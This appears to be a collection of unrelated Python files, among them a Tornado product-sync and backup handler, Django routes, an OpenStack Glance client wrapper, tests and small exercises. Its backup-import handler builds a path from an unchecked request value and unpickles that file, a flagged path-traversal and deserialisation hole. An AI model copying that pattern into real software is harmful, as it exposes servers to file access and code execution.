            # BUG FIX: os.path.join('media/img/product/', offer_id, '.jpg')
            # treated '.jpg' as a separate path component and produced
            # 'media/img/product/<offer_id>/.jpg'; the thumbnail is saved
            # as '<offer_id>.jpg'.
            os.remove(os.path.join('media/img/product/', product.offer_id + '.jpg'))
        self.write({'error': '', 'data': product_id})
class ShopHandler(FetchDataHelper):
    """Sync the local product DB against the remote shop (actions: init, update)."""

    def initialize(self):
        super().initialize()
        self.today = datetime.date.today()
        self.config = self.db.query(model.ConfigModel).first()

    def add_product(self, offer_id, data=None, commit=False):
        """Fetch one offer and insert it as a new product with skus and thumbnail.

        Returns the new ProductModel, or None when the offer has no item
        number (treated as a non-product and skipped).
        """
        data = data or self.fetch_offer_dict(offer_id)
        if not data['productFeatureList'].get('货号'):  # no item number -> not a product, skip
            print('%s not added!' %offer_id)
            return None
        product = self.fetch_product(offer_id, data=data)
        product.update_date = self.today
        product.skus = self.fetch_skus(data=data)
        product.update_sku_relative()
        product.update_last()
        self.db.add(product)
        self.save_img(self.thumb(product.img_url), offer_id)
        if commit: self.db.commit()
        print('%s added!' %offer_id)
        return product

    def update_product(self, product, data=None, commit=False, force=False):
        """Refresh one product from the remote offer data.

        Returns: 0 = skipped (not expired yet), -1 = moved to the recycle
        bin, 2 = restored from the recycle bin, 1 = plain update.
        """
        if not force and not product.is_expiries(self.config.expiry_days):  # throttle by expiry window
            print('%s not expired!' % product.offer_id)
            return 0
        data = data or self.fetch_offer_dict(product.offer_id)
        # Recycle-bin handling: offers without an item number, without a
        # begin date, or whose begin is past the normal window get shelved.
        if not data['productFeatureList'].get('货号') or not data['begin'] or data['begin']>self.config.normal_begin:
            product.status = '回收站'
            if commit: self.db.commit()
            print('%s droped!' % product.offer_id)
            return -1
        old_img_url = product.img_url
        self.update_obj(product, self.fetch_product(product.offer_id, data=data, raw=True))
        self.delete_objs(product.skus)
        new_img_url = product.img_url
        product.skus = self.fetch_skus(data=data)
        product.update_sku_relative()
        product.update_date = self.today
        # Only refetch the thumbnail when the image actually changed.
        if new_img_url!=old_img_url: self.save_img(self.thumb(new_img_url), product.offer_id)
        if product.status=='回收站':
            # Previously recycled product came back: put it on the shelf again.
            product.status='上架'
            if commit: self.db.commit()
            print('%s added!' % product.offer_id)
            return 2
        if commit: self.db.commit()
        print('%s updated!' % product.offer_id)
        return 1

    def init(self):
        """ Initialize the database (first run only). """
        if self.db.query(model.ProductModel).count(): return self.write('请删除数据库后再试!')  # only for the first run
        commit_count_temp = 0
        for offer_id in self.fetch_offer_list():
            self.add_product(offer_id)
            commit_count_temp += 1
            # Commit in batches of 20 to bound transaction size.
            if commit_count_temp % 20 == 0: self.db.commit()
        self.config.update_date = self.today
        self.db.commit()
        #self.write('Init')
        self.redirect('/')

    def update(self):
        """ Fetch remote data and update the local DB. """
        force = self.get_argument('force', False)
        if not force and not self.config.is_expiries():
            return self.write('上次更新时间是 %s, %d天内只能更新一次.' % (self.config.update_date, self.config.expiry_days))
        commit_count_temp = 0
        new_products = []
        drop_products = []
        # Snapshot of existing products keyed by offer_id; entries still in
        # the dict after the listing pass were not seen remotely.
        products_dict = dict(self.db.query(model.ProductModel.offer_id, model.ProductModel).all())
        for offer_id in self.fetch_offer_list():
            print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')
            print(offer_id)
            product = products_dict.get(offer_id)
            if not product:
                product = self.add_product(offer_id, commit=True)
                if not product: continue
                new_products.append(product)
            else:
                products_dict.pop(offer_id)
                temp = self.update_product(product, force=force)
                if temp==0:
                    continue
                elif temp==-1:
                    drop_products.append(product)
                elif temp==2:
                    new_products.append(product)
            commit_count_temp += 1
            if commit_count_temp % 20 == 0: self.db.commit()
        # Second pass: products no longer listed remotely.
        for product in products_dict.values():
            temp = self.update_product(product)
            if temp==0:
                continue
            elif temp==-1:
                drop_products.append(product)
            elif temp==2:
                new_products.append(product)
            commit_count_temp += 1
            if commit_count_temp % 20 == 0: self.db.commit()
        self.config.update_date = self.today
        self.db.commit()
        print('>>>>>>>>>>>>>>>>>>>>>')
        print('Update done! %d found! %d droped!' % (len(new_products), len(drop_products)))
        self.render('ledia/update.html', new_products=new_products, drop_products=drop_products)

    def get(self, action):
        # Dispatch /shop/<action> to the method of the same name.
        getattr(self, action)()
class HomeHandler(base.BaseHelper):
    """Product list page with exact filters, keyword search and sorting."""

    def initialize(self):
        super().initialize()
        self.config = self.db.query(model.ConfigModel).first()

    def get(self):
        if not self.config:
            return self.redirect('/config')
        filter_certains = {}
        # Exact-match filters from the query string ('全部' means "all", i.e. no filter).
        for arg in ('category', 'sku_status', 'status'):
            value = self.get_argument(arg, '全部')
            if value!='全部': filter_certains[arg] = value
        data = self.db.query(model.ProductModel).filter_by(**filter_certains)
        keywords = self.get_argument('keywords', None)
        query_columns = self.get_argument('query_columns', None)
        query_columns_dict = dict(const.query_columns_dict)
        if keywords and query_columns and query_columns in query_columns_dict:
            columns = query_columns_dict.get(query_columns)
            keywords = keywords.lower()
            # Space-separated keywords -> OR search; otherwise split on
            # unescaped '+' for an AND search (literal '\+' is unescaped).
            or_keywords = re.split(r' +', keywords)
            if len(or_keywords)>1:
                keywords = or_keywords
                method = sqlalchemy.or_
            else:
                keywords = [item.replace('\\+', '+') for item in re.split(r'(?<!\\)\++', keywords)]
                method = sqlalchemy.and_
            data = data.filter(method(*[getattr(model.ProductModel, columns).like('%'+keyword+'%') for keyword in keywords]))
        # Multi-column search, currently unused
        #keywords = re.split(r' +', keywords.lower())
        #query_columns = self.get_argument('query_columns', '全文')
        #query_columns_dict = dict(const.query_columns_list)
        #if query_columns=='全文':
            #query_columns = query_columns_dict.values()
        #elif query_columns in query_columns_dict:
            #query_columns = [query_columns_dict.get(query_columns)]
        #else:
            #query_columns = []
        #data = self.multi_columns_query(data, model.ProductModel, query_columns, keywords)
        sort_columns = self.get_argument('sort_columns', None)
        sort_columns_dict = dict(const.sort_columns_dict)
        if sort_columns and sort_columns in sort_columns_dict:
            columns = sort_columns_dict.get(sort_columns)
            desc = self.get_argument('desc', None)
            columns_obj = getattr(model.ProductModel, columns)
            data = data.order_by(columns_obj.desc() if desc else columns_obj)
        else:
            # Default: newest products first.
            data = data.order_by(model.ProductModel.id.desc())
        self.show_page('ledia/index.html', data, self.config.per_page)
class ConfigHandler(base.BaseHelper):
    """Show and persist the single ConfigModel row."""

    def get(self):
        """Render the config form with the current config (or an empty one)."""
        current = self.db.query(model.ConfigModel).first()
        self.render('ledia/config.html', config=current or {})

    def post(self):
        """Create or update the config from the posted form fields."""
        config_id = self.get_argument('id', None)
        if config_id:
            config = self.db.query(model.ConfigModel).first()
        else:
            config = model.ConfigModel()
        for field in self.request.arguments:
            if field!='id' and hasattr(config, field):
                value = self.get_argument(field, None)
                # Dates arrive as 'YYYY-MM-DD' strings; parse before storing.
                if field=='update_date' and value:
                    value = datetime.datetime.strptime(value, '%Y-%m-%d').date()
                setattr(config, field, value or None)
        if not config_id:
            self.db.add(config)
        self.db.commit()
        self.redirect('/config')
class BackupHandler(base.BaseHelper):
    """Create (POST), import (PUT) and delete (DELETE) pickle backups of the
    config/product tables stored under media/backup/."""
    def get(self):
        # List every backup file currently present on disk.
        self.render('ledia/backup.html', backups=os.listdir('media/backup'))
    def post(self):
        """Dump the requested table ('configs' or 'products') to a timestamped .bak file."""
        print('create')
        backup = self.get_argument('backup')
        if backup not in ('configs', 'products'):
            return self.write({'error': True})
        target = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d_%H%M%S%f-'+backup)
        with open('media/backup/'+target+'.bak', 'wb') as f:
            backup_model = {'configs': model.ConfigModel, 'products': model.ProductModel}.get(backup)
            # Products back up only a few editable columns; configs dump everything except `id`.
            columns = ('category', 'status', 'remarks') if backup=='products' else None
            backup_dict = {}
            for row in self.db.query(backup_model):
                backup_dict[row.id] = self.model2dict(row, columns, ['id'])
            pickle.dump({backup: backup_dict}, f)
        # BUG FIX: the old code also had an unreachable `return self.write({'error': True})`
        # after the with-block return; it has been removed.
        return self.write({'error': None, 'data': target})
    def put(self):
        """Restore rows from a backup file by overwriting matching ids in the database."""
        print('import')
        target = self.get_argument('backup', None)
        if not target: return self.write({'error': True})
        # NOTE(review): `target` is interpolated into a filesystem path unchecked;
        # a value containing '../' could escape media/backup — confirm callers are trusted.
        with open('media/backup/'+target+'.bak', 'rb') as f:
            # pickle.load is only safe here because the file was written by this server.
            backup_dicts = pickle.load(f)
        # File handle is released before the (potentially long) DB update below.
        backup_models = {'configs': model.ConfigModel, 'products': model.ProductModel}
        for backup in backup_dicts:
            backup_dict = backup_dicts.get(backup)
            backup_model = backup_models.get(backup)
            for row in self.db.query(backup_model):
                for key, value in backup_dict.get(row.id, {}).items():
                    setattr(row, key, value)
        self.db.commit()
        self.write({'error': None})
    def delete(self):
        """Remove a backup file from disk (no error when it does not exist)."""
        print('delete')
        target = self.get_argument('backup', None)
        target = target and 'media/backup/' + target + '.bak'
        print(target)
        if target and os.path.exists(target):
            os.remove(target)
        self.write({'error': None})
class TestHandler(base.BaseHelper):
    """Ad-hoc smoke-test endpoint: bumps the first config row's update_date."""
    def get(self):
        print('********************************')
        print('test')
        self.write('test')
        # NOTE(review): .first() may return None if the config table is empty,
        # which would raise AttributeError here — confirm a row always exists.
        self.db.query(model.ConfigModel).first().update_date = datetime.date.today()
        self.db.commit()
|
from django.contrib import admin
from django.urls import path, include
from django.conf.urls import url
from User.views import (UserExtendedListAPIView,
UserExtendedRetrieveAPIView,
UserExtendedUpdateAPIView,
UserExtendedDeleteAPIView,
UserExtendedCreateAPIView,
UserCreateAPIView,
UserLoginAPIView)
app_name = 'User'
# URL routes for the User API (list/detail/edit/delete/create/register/login).
# NOTE(review): the regexes are not anchored with '^', so e.g. 'mylist/' also
# matches r'list/$' — confirm whether anchored patterns were intended.
urlpatterns = [
    url(r'list/$', UserExtendedListAPIView.as_view(), name='list'),
    url(r'detail/(?P<pk>\d+)$', UserExtendedRetrieveAPIView.as_view(), name='detail'),
    url(r'edit/(?P<pk>\d+)$', UserExtendedUpdateAPIView.as_view(), name='update'),
    url(r'delete/(?P<pk>\d+)$', UserExtendedDeleteAPIView.as_view(), name='delete'),
    url(r'create/$', UserExtendedCreateAPIView.as_view(), name='create'),
    url(r'register/$', UserCreateAPIView.as_view(), name='register'),
    url(r'login/$', UserLoginAPIView.as_view(), name='login'),
]
|
class Cat(object):
    """A cat that remembers the single argument it was constructed with."""
    def __init__(self, arg):
        super(Cat, self).__init__()
        self.arg = arg
    def eat(self, food):
        """Return a short message describing this cat eating *food*.

        BUG FIX: the script below calls Cat.eat(), but no such method
        existed, so the original crashed with AttributeError on import.
        """
        return '%s eats %s' % (self.arg, food)
c = Cat('ss')
Cat.eat(c, 'mycat')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-27 19:00
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add an optional, unique github_id to Label."""
    dependencies = [
        ('core', '0006_remove_username_hack'),
    ]
    operations = [
        migrations.AddField(
            model_name='label',
            name='github_id',
            # blank/null so existing rows migrate cleanly; unique across non-null values
            field=models.PositiveIntegerField(blank=True, null=True, unique=True),
        ),
    ]
|
def gcd(x, y):
    """Return the greatest common divisor of x and y via Euclid's algorithm."""
    while y != 0:
        x, y = y, x % y
    return x
# Read whitespace-separated integers; compute GCD and LCM of the largest and
# smallest. NOTE(review): with more than two inputs the middle values are
# ignored — confirm the input is always exactly two numbers.
nums = list(map(int, input().split()))
x, y = max(nums), min(nums)
GCD = gcd(x, y)
LCM = x*y//GCD  # lcm(a, b) = a*b // gcd(a, b); // keeps the result an int
print(GCD)
print(LCM)
|
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# author: fmount <francesco.pantano@linux.com>
from keystoneauth1.identity import v2
from keystoneauth1 import session
from keystoneauth1 import loading
from glanceclient import Client
from prettytable import PrettyTable
from handlers import Error, ConflictException, ForbiddenException
import json
import logging
import sys
import re
# DEBUG SECTION
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
LOG = logging.getLogger(__name__)
##
# TODO: LOG.propagate = True | False (Toggle logging propagation)
class Wglance():
    """Thin wrapper around the Glance v2 image client (one instance per session)."""
    # Just to make sure there is only one client
    __instance = None
    def __init__(self, u, mode, debug):
        """Build an authenticated Glance client for user *u*.

        mode == "password" uses the keystoneauth password plugin loader;
        any other mode falls back to a keystone v2 Password auth.
        """
        if Wglance.__instance:
            raise Exception("Just one client per session allowed!")
        Wglance.__instance = self
        self.user = u
        if mode == "password":
            loader = loading.get_plugin_loader('password')
            auth = loader.load_from_options(auth_url=u.endpoint, username=u.name, \
                    password=u.password, tenant_name=u.tenant_name)
        else:
            auth = v2.Password(username=u.name, password=u.password, \
                    tenant_name=u.tenant_name, auth_url=u.endpoint)
        self.s = session.Session(auth=auth)
        self.glance = Client('2', session=self.s)
        self.debug = debug
    def __str__(self):
        # BUG FIX: __str__ must return a string; the old version printed and
        # implicitly returned None, so str(instance) raised TypeError.
        return str(self.glance)
    def saysomething(self):
        # print() form works on both Python 2 and 3 (was a py2-only print statement)
        print("I exist")
    def exists(self, image_id):
        '''
        Return True when the image can be fetched, False otherwise.
        TODO: Check if the image type is NOT "snapshot"
        '''
        try:
            self.glance.images.get(image_id)
            return True
        except Exception as e:  # py2 `except Exception, e` syntax modernized
            # BUG FIX: '^404*' matched any message starting with "40"; '^404' is the intent.
            if re.search(r'^404', str(e)):
                LOG.error("[404] IMAGE %s NOT FOUND" % image_id)
                return False
            return False
    def image_show(self, image_id):
        """Pretty-print every property of the image as a two-column table."""
        table = PrettyTable(['Property', 'Value'])
        for k, v in json.loads(json.dumps(self.glance.images.get(image_id))).items():
            table.add_row([k, v])
        print(table)
    def toggle_visibility(self, image_id, visibility):
        """Set the image visibility to 'private' or 'public' (other values are ignored)."""
        # BUG FIX: string comparison must use ==, not identity (`is`).
        if visibility == "private":
            self.glance.images.update(image_id, visibility='private')
        elif visibility == "public":
            self.glance.images.update(image_id, visibility='public')
        LOG.info("Visibility for image %s is now %s" % (image_id, visibility))
    # Add a share for the image provided;
    def add_share(self, image_id, tenant_id):
        '''
        >> image_id: the image provided
        >> tenant_id: an array of id who share the image
        '''
        try:
            LOG.info("Adding member %s for image %s " % (tenant_id, image_id))
            self.glance.image_members.create(image_id, tenant_id)
            self.update_membership_status(image_id, tenant_id, "accepted")
        except Exception as e:
            if re.search(r'^409', str(e)):
                LOG.error("[409] THIS MEMBERSHIP WAS ALREADY DEFINED")
            # BUG FIX: the old code inspected `self.error`, an attribute that does
            # not exist (AttributeError); the caught exception `e` is what's meant.
            elif re.search(r'^403', str(e)):
                LOG.error("[403] FORBIDDEN")
    def delete_image(self, image_id):
        """Delete the image outright."""
        self.glance.images.delete(image_id)
    def remove_share(self, image_id, tenant_id):
        '''
        >> image_id: the image provided
        >> tenant_id: an array of id who share the image
        '''
        try:
            LOG.info("Remove member %s for image %s " % (tenant_id, image_id))
            m = self.glance.image_members.delete(image_id, tenant_id)
            # BUG FIX: re.search needs a string; the delete() result may be None
            # (which previously raised TypeError and always hit the except path).
            if re.search(r'^40', str(m)):
                raise Exception("Something about Permissions went wrong: ch[mod|own] something")
        except Exception:
            raise Exception("No idea what could go wrong..")
    def update_membership_status(self, image_id, tenant_id, status):
        """Set a member's status ('accepted', 'pending', 'rejected') for the image."""
        self.glance.image_members.update(image_id, tenant_id, status)
    def print_image_list(self):
        """Pretty-print id/visibility/deprecated for every visible image."""
        table = PrettyTable(['ID', 'VISIBILITY', 'DEPRECATED'])
        for image in self.glance.images.list():
            img = json.loads(json.dumps(image))
            table.add_row([img.get('id'), img.get('visibility'), img.get('deprecated', \
                    'no_deprecated')])
        print(table)
    def get_image_list(self):
        """Return the ids of every visible image."""
        imgs = []
        for image in self.glance.images.list():
            img = json.loads(json.dumps(image))
            imgs.append(img.get('id'))
        return imgs
    def show_member_list(self, image_id):
        '''
        Show the member list for the given image
        '''
        table = PrettyTable(['Image ID', 'Member ID', 'Status [CAN SHARE]'])
        for member in self.glance.image_members.list(image_id):
            mbm = json.loads(json.dumps(member))
            table.add_row([mbm.get('image_id'), mbm.get('member_id'), mbm.get('status')])
        print(table)
    def member_list(self, image_id):
        '''
        Return a list containing all members for the given image
        '''
        member_list = []
        for member in self.glance.image_members.list(image_id):
            mbm = json.loads(json.dumps(member))
            member_list.append(mbm.get('member_id'))
        return member_list
    def get_all_images(self):
        """Return the ids of all images (same data as get_image_list)."""
        img_list = []
        for image in self.glance.images.list():
            img = json.loads(json.dumps(image))
            img_list.append(img.get('id'))
        return img_list
    def is_visible(self, image_id):
        """Return True when the image's visibility is 'public'."""
        for k, v in json.loads(json.dumps(self.glance.images.get(image_id))).items():
            # BUG FIX: value comparison with ==, not `is` (string identity is not guaranteed).
            if k == "visibility" and v == "public":
                return True
        return False
    def is_deprecated(self, image_id):
        """Return the 'deprecated' property value when present, else False."""
        for k, v in json.loads(json.dumps(self.glance.images.get(image_id))).items():
            if k == "deprecated":
                LOG.info("[DEBUG] The image %s IS deprecated " % image_id)
                return v
        LOG.info("[DEBUG] The image %s is NOT deprecated " % image_id)
        return False
    def toggle_deprecated(self, image_id, bool_value):
        """Mark the image deprecated; only allowed while the image is private."""
        if self.is_visible(image_id) is False:
            self.glance.images.update(image_id, deprecated=str(bool_value))
            return True
        # BUG FIX: loggers have no WARN method (AttributeError); use warning().
        LOG.warning("Cannot Deprecate the image %s : Make it private first!!" % image_id)
        return False
    def is_shared(self, image_id, tenant_id):
        """Return True when the image has at least one member.

        NOTE(review): tenant_id is accepted but never consulted — confirm
        whether membership of that specific tenant was intended.
        """
        return len(self.member_list(image_id)) > 0
|
import unittest
import sys, os
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + '/../src')
from bio_convertors import dna_to_rna, dna_to_protein, reverse_complement, gc_content
class TestBioConvertors(unittest.TestCase):
    """Unit tests for the bio_convertors sequence-conversion helpers."""
    def test_dna_to_rna(self):
        #Arrange
        sequence = "ACGT"
        #Act
        rna = dna_to_rna(sequence)
        #Assert: T is transcribed to U
        self.assertEqual(rna, "ACGU")
    def test_dna_to_protein(self):
        #Arrange
        sequence = "TCAGG"
        #Act
        protein = dna_to_protein(sequence)
        #Assert: first reading frame translates TCA -> serine (S)
        self.assertEqual(protein['frame 1:'], "S")
    def test_reverse_complement(self):
        #Arrange
        sequence = "TCAGG"
        #Act
        seq_reversed = reverse_complement(sequence)
        #Assert
        self.assertEqual(seq_reversed, "CCTGA")
    def test_gc_content(self):
        #Arrange: 3 of 6 bases are G or C
        sequence = "TCAGGA"
        #Act
        gc = gc_content(sequence)
        #Assert
        self.assertEqual(gc, 0.5)
def main():
    """Entry point: discover and run every test in this module."""
    unittest.main()
if __name__ == "__main__":
    main()
from ..type import SimpleType
class NumericString(SimpleType):
    """ASN.1 NumericString simple type (digits and space only)."""
    def __init__(self):
        super(NumericString, self).__init__()
        # Name used when emitting/printing the ASN.1 type reference.
        self.typereference = "NumericString"
|
from setuptools import setup
DESCRIPTION = "Alexa Skills Kit API ported to Python"
# Standard setuptools metadata; the one-line description doubles as the long
# description. NOTE(review): the GitHub URL has no owner/user segment — verify.
setup(
    name="alexa-skills-kit",
    version="0.0.1",
    author="Ian Adam Naval",
    author_email="ianonavy@gmail.com",
    description=DESCRIPTION,
    license="MIT",
    keywords="alexa skills kit voice recognition",
    url="https://github.com/python-alexa-skills-kit",
    packages=['alexa'],
    long_description=DESCRIPTION,
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Topic :: Utilities",
        "License :: OSI Approved :: MIT License",
    ],
)
|
import sys
import gui
from PyQt5 import QtWidgets
# Window creation: build the Qt application, wire the generated UI into a
# QMainWindow, show it, and block in the Qt event loop until the app exits.
if __name__ == "__main__":
    app = QtWidgets.QApplication(sys.argv)
    janela = QtWidgets.QMainWindow()
    ui = gui.Ui_janela()
    ui.setupUi(janela)
    janela.show()
    sys.exit(app.exec_())
# export PYTHONPATH=[...]/src
# 项目下运行
# export PYTHONPATH=$PYTHONPATH:`pwd`:`pwd`/src
# 对LFW数据库进行人脸检测和对齐的方法命令
'''
python3 src/align/align_dataset_mtcnn.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/raw \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/lfw_mtcnnpy_160 \
--image_size 160 --margin 32 \
--random_order
'''
'''
Output:
Total number of images: 13233
Number of successfully aligned images: 13233
'''
# 校验LFW数据库准确率
'''
python3 src/validate_on_lfw.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/lfw_mtcnnpy_160 \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/models/facenet/20170512-110547/
'''
'''
Output:
Runnning forward pass on LFW images
Accuracy: 0.992+-0.003
Validation rate: 0.97467+-0.01477 @ FAR=0.00133
Area Under Curve (AUC): 1.000
Equal Error Rate (EER): 0.007
'''
# 计算人脸两两之间的距离
'''
python3 src/compare.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/models/facenet/20170512-110547/ \
./test_imgs/1.jpg ./test_imgs/2.jpg ./test_imgs/3.jpg
'''
'''
Output:
Images:
0: ./test_imgs/1.jpg
1: ./test_imgs/2.jpg
2: ./test_imgs/3.jpg
Distance matrix
0 1 2
0 0.0000 0.7270 1.1283
1 0.7270 0.0000 1.0913
2 1.1283 1.0913 0.0000
'''
# 用MTCNN进行检测和对齐CASIA数据集
'''
python3 src/align/align_dataset_mtcnn.py \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/casia/raw/ \
~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/casia/casia_maxpy_mtcnnpy_182 \
--image_size 182 --margin 44
'''
# 重新进行训练新模型
'''
python3 src/train_softmax.py \
--logs_base_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/logs/facenet/ \
--models_base_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/models/facenet/ \
--data_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/casia/casia_maxpy_mtcnnpy_182 \
--image_size 160 \
--model_def models.inception_resnet_v1 \
--lfw_dir ~/Project/ComputerVision-Projects/14.Face\ Identification\ \&\ Recognition/dataset/lfw/lfw_mtcnnpy_160 \
--optimizer RMSPROP \
--learning_rate -1 \
--max_nrof_epochs 80 \
--keep_probability 0.8 \
--random_crop --random_flip \
--learning_rate_schedule_file
data/learning_rate_schedule_classifier_casia.txt \
--weight_decay 5e-5 \
--center_loss_factor 1e-2 \
--center_loss_alfa 0.9
'''
|
from mitmproxy import ctx
def load(l):
    """mitmproxy addon hook: register the boolean 'custom' option at load time."""
    ctx.log.info("Registering option 'custom'")
    l.add_option("custom", bool, False, "A custom option")
def configure(options, updated):
    """mitmproxy addon hook: log the 'custom' option whenever its value changes."""
    if "custom" not in updated:
        return
    ctx.log.info("custom option value: %s" % options.custom)
|
import argparse
import asyncio
import ssl
import aiohttp
@asyncio.coroutine
def main(conn, url):
    """Fetch *url* once; print ACCEPT on success or REJECT when TLS/certificate
    validation fails; any other error is re-raised.

    NOTE(review): uses the legacy generator-based coroutine style and the old
    aiohttp.errors module — both removed in modern asyncio/aiohttp; confirm the
    pinned aiohttp version before modernizing.
    """
    with aiohttp.ClientSession(connector=conn) as session:
        try:
            response = yield from session.get(url)
            yield from response.release()
        except aiohttp.errors.ClientOSError as exc:
            # Walk the __cause__ chain looking for an SSL failure buried
            # inside the OS-level connection error.
            while exc is not None:
                exc = exc.__cause__
                if isinstance(exc, ssl.SSLError):
                    print('REJECT')
                    break
            else:
                raise
        except ssl.CertificateError:
            print('REJECT')
        else:
            print('ACCEPT')
# CLI: host port [cafile]. With a CA file, build a connector that validates the
# server certificate against it; otherwise use aiohttp's defaults.
ap = argparse.ArgumentParser()
ap.add_argument('host')
ap.add_argument('port')
ap.add_argument('cafile', nargs='?')
options = ap.parse_args()
url = 'https://{host}:{port}'.format(**vars(options))
if options.cafile is not None:
    context = ssl.create_default_context(cafile=options.cafile)
    conn = aiohttp.TCPConnector(ssl_context=context)
else:
    conn = None
loop = asyncio.get_event_loop()
loop.run_until_complete(main(conn, url))
|
class ExecutionException(Exception):
    """Exception that exposes its first positional argument as .message."""

    def __init__(self, *args):
        """Store the first argument (if any) as the message; pass all args up."""
        super().__init__(*args)
        self.message = args[0] if args else None

    def __str__(self):
        """Prefer the stored message; fall back to Exception's default text."""
        if self.message:
            return self.message
        return super().__str__()
# Given an array of statue sizes in a random order, how many additional statues
# would you need to arrange each statue so that each statue is only 1 unit taller than the previous one?
# All statues will have sizes between 0 and 20, and the given array will have a maximum length of 10.
# Example
# For the array of statues = [6, 2, 3, 8], the output should be
# numberStatues(statues) = 3.
# The completed set of statues needs the sizes 4, 5 and 7.
def number_statues(sizes):
    """Return how many additional statues complete the consecutive run min..max.

    The finished set must contain every integer size between the smallest and
    largest statue, so the answer is (max - min + 1) - len(sizes).  Assumes
    the sizes are distinct, per the problem statement.

    The original inlined this with hand-rolled min/max loops and an
    always-true `>= 0` guard (its else-branch was dead code).
    """
    return (max(sizes) - min(sizes)) - len(sizes) + 1


statues = [5, 4, 6]
print(number_statues(statues))
# def numberStatues(statues):
# print( numberStatues( [6, 2, 3, 8]) )
# return True
# ******** Tests ************
# print( numberStatues( [6, 2, 3, 8]) )
# print( numberStatues( [5, 4, 6] ) )
# print( numberStatues( [6, 3] ) )
# print( numberStatues( [0, 3] ) )
# print( numberStatues( [19, 5, 8, 14, 11]) ) |
import math
# Python 2 script: raw_input() was renamed input() in Python 3.
n=int(raw_input("What is the index of your favorite prime? "))
def isprime(n):
    """Return True when n is prime (trial division up to ceil(sqrt(n)))."""
    if n < 2:
        return False
    if n == 2:
        return True
    upper = int(math.ceil(math.sqrt(n))) + 1
    for divisor in range(2, upper):
        if n % divisor == 0:
            return False
    return True
def prime(n):
    """Print the list of the first n primes (search starts at 0).

    Fixes: the original shadowed the builtin `list` and used the
    Python-2-only `print list` statement; print(primes) with a single
    argument prints identically on Python 2 and 3.
    """
    primes = []
    candidate = 0
    while len(primes) < n:
        if isprime(candidate):
            primes.append(candidate)
        candidate += 1
    print(primes)
prime(n) |
import re
import requests
import html
import time
from bs4 import BeautifulSoup
def crawl_joke_list_use_bs4(page=1):
    """Fetch one page of qiushibaike.com jokes and print author + joke text.

    NOTE(review): the CSS class names are tied to the site's 2010s-era markup
    and the site may no longer serve this structure — verify before relying on it.
    """
    url = "http://www.qiushibaike.com/8hr/page/" + str(page)
    res = requests.get(url)
    soup = BeautifulSoup(res.content, "html.parser")
    joke_list = soup.find_all("div", class_="article block untagged mb15")
    for child in joke_list:
        # h2 holds the author name; the content div holds the joke body.
        print(child.find("h2").string + "\t" + "".join(child.find("div", class_="content").stripped_strings))
        time.sleep(1)  # throttle output / be polite to the server
if __name__ == '__main__':
    # Crawl only the first page when run as a script.
    crawl_joke_list_use_bs4(1)
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure fixed base setting is extracted properly.
"""
import TestGyp
import sys
if sys.platform == 'win32':
    # MSVC-only test: builds linker-flags/fixed-base.gyp and inspects the
    # produced binaries' PE headers for the /FIXED (relocations stripped) flag.
    test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
    CHDIR = 'linker-flags'
    test.run_gyp('fixed-base.gyp', chdir=CHDIR)
    test.build('fixed-base.gyp', test.ALL, chdir=CHDIR)
    def GetHeaders(exe):
        """Return dumpbin /headers output for the built binary *exe*."""
        full_path = test.built_file_path(exe, chdir=CHDIR)
        return test.run_dumpbin('/headers', full_path)
    # For exe, default is fixed, for dll, it's not fixed.
    if 'Relocations stripped' not in GetHeaders('test_fixed_default_exe.exe'):
        test.fail_test()
    if 'Relocations stripped' in GetHeaders('test_fixed_default_dll.dll'):
        test.fail_test()
    # Explicitly not fixed.
    if 'Relocations stripped' in GetHeaders('test_fixed_no.exe'):
        test.fail_test()
    # Explicitly fixed.
    if 'Relocations stripped' not in GetHeaders('test_fixed_yes.exe'):
        test.fail_test()
    test.pass_test()
|
"""Helpers used for backup package"""
from pathlib import Path
import sys
sys.path.insert(0, str(Path(__file__).absolute().parents[1] / "lib")) # add libraries to path
from colorama import Fore, Style, init # type: ignore
init()
from typing import Union
def error_message(text: str, level: int) -> None:
    """Gives a colored error message to user. When level is 3, the program exits"""
    if level == 3:
        # Fatal: red text on stderr, then terminate with status 1.
        print(f'{Fore.RED}{text}{Style.RESET_ALL}', file=sys.stderr)
        sys.exit(1)
    elif level == 2:
        # orange — level-2 (warning) output is not implemented yet; calls are a no-op
        pass
    elif level == 1:
        # Informational: yellow text on stdout.
        print(f'{Fore.YELLOW}{text}{Style.RESET_ALL}')
def getDataFolder() -> Path:
    """Return the project's data directory, two levels above this file."""
    project_root = Path(__file__).absolute().parents[2]
    return project_root / "data"
def file_exists(filename: str) -> bool:
    """Return True if *filename* refers to an existing regular file."""
    # is_file() already returns a bool; no if/else needed.
    return Path(filename).is_file()
def dir_exists(directory: str) -> bool:
    """Return True if *directory* refers to an existing directory."""
